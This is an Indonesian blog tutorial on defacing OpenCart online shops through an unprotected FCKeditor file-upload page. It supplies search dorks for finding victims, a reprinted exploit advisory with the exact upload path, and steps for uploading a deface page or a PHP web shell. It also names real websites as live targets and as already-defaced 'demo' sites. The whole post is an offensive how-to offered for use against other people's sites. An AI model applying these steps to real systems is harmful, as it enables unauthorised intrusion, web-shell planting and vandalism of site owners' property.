Home Deface Hacking Keamanan Website Security Tester Tutorial Simple Deface OpenCart CMS dengan Teknik FCK Editor

Tuesday, 26 May 2015

Simple Deface OpenCart CMS dengan Teknik FCK Editor

xixixhi,, ketemu lagi sama saya Nuenomaru.
okeh utk kali ini saya akan share sesuai judul thread ini.
kali ini simple gak repot kok, sebelumnya baca thread ini dulu gan:
Tutorial Eksekusi Deface dengan FCKeditor Simple
soalnya teknik dan cara eksekusinya sama kok.
yo langsung stepnya:



Dork:
SUPPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
Klo pengen smuanya, site nya ilangin jadi gini aja Powered By OpenCart

 Detail Exploit:
==========================================
Opencart remote file Upload Vulnerability
==========================================

#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: Net.Edit0r@Att.Net ~ Black.Hat.tm@Gmail.com
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php

######################################Iranian HackerZ####################################

# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php

######################################Demo Example####################################

#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

#########################################################################################

#Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~
_AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ )))


########################################## End ##########################################

Live Target: http://www.superbikecarbonparts.com/

 bisa juga dgn target www.target.com/pacth/ itu kalo dpt target yg ada di /patch/ nya
ex: http://www.target.com/patch/
bisa juga www.target.com/shop atau www.target.com/cart
sesuain aja sama pathnya.

 nah kalo dh dpt target, langsung aja kita inject exploitnya

 for exploit :

admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

 jadi nya kek gini
ex: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

 kalo target yang ad /patch/ , inject nya d belakang patch nya
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

 kalo /shop ya jadinya:
ex: www.target.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

 liat yg kluar, distu trdapat tempat upload file nya.....
connector pilih PHP
langsung aja kita upload file html deface kita...
ya kalo sobat mau upload shell juga bisa sih.


jika berhasil maka akan keluar alert seperti ini

 Code:
"file uploaded with no errors"
jika muncul pesan atau notice kek gitu ya berarti berhasil

 liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

 sekrang liat hasilnya....
www.target.com/namauploadanda.html (kalo upload shell ya /namashell.php )

 ex hasil: http://www.superbikecarbonparts.com/nuenomaru.html



Sekian tutorial Deface simple ini.
semoga bermanfaat dan dapat menghibur sobat wkwkwk
maaf jika ada kesalahan, keep Happy Deface

Source and thanks to: Binus Hacker

Demo Tested By Nuenomaru | TKJ Cyber Art :
http://www.disulmona.com/nuenomaru.html
http://wolfi.it/nuenomaru.html
http://www.superbikecarbonparts.com/nuenomaru.html

 http://volomilano.altervista.org/upload//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
http://www.oriensanimali.com/public/ec/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
http://thailandcarving.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
http://www.xpalpower.com.tw/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
http://www.lubetlenceria.com/ventas/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

 Nuenomaru


Nuenomaru just an illusion in Cyber World




Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Simple Deface OpenCart CMS dengan Teknik FCK Editor Simple Deface OpenCart CMS dengan Teknik FCK Editor MasterBlog TCA 5.0 stars based on 35 reviews xixixhi,, ketemu lagi sama saya Nuenomaru. okeh utk kali ini saya akan share sesuai judul thread ini. kali ini simple gak repot kok, sebel...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post


EmoticonEmoticon

Subscribe to: Post Comments (Atom)